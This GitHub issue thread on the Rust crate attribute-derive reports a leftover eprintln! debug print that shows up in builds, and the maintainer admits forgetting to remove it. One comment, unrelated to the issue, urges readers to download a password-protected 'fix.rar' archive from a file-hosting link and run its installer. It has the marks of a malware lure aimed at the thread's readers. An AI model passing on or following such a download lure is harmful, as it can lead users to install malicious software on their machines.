### ISSUE TITLE
Debug print show up during build

### ISSUE THREAD

**Issue by tyoeer** [ModProg/attribute-derive#21]
There's an `eprintln!()` at
https://github.com/ModProg/attribute-derive/blob/058deac81bcce9091773fe8b2d28acaba756975f/macro/src/lib.rs#L197
that appears to show up in my builds.

I have an attribute like this:
```rust
#[derive(FromAttr)]
#[attribute(ident = field_list)]
```
which is the only place in my project where `ident = field_list` appears, and it shows up in my builds like this
```
   ...
   Compiling attribute-derive v0.10.0
   Compiling leptos_meta v0.6.14
   Compiling ff-macros v0.1.0 (C:\Users\Me\projects\rust\fusta-femas\ff-macros)
ident = field_list
   Compiling sea-schema v0.14.2
   ...
```

Attribute in full project for context in case it helps: https://github.com/tyoeer/fusta-femas/blob/main/ff-macros/src/field_list.rs#L12

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ModProg** [comment]
that is definitely me forgetting to removing debug prints :D
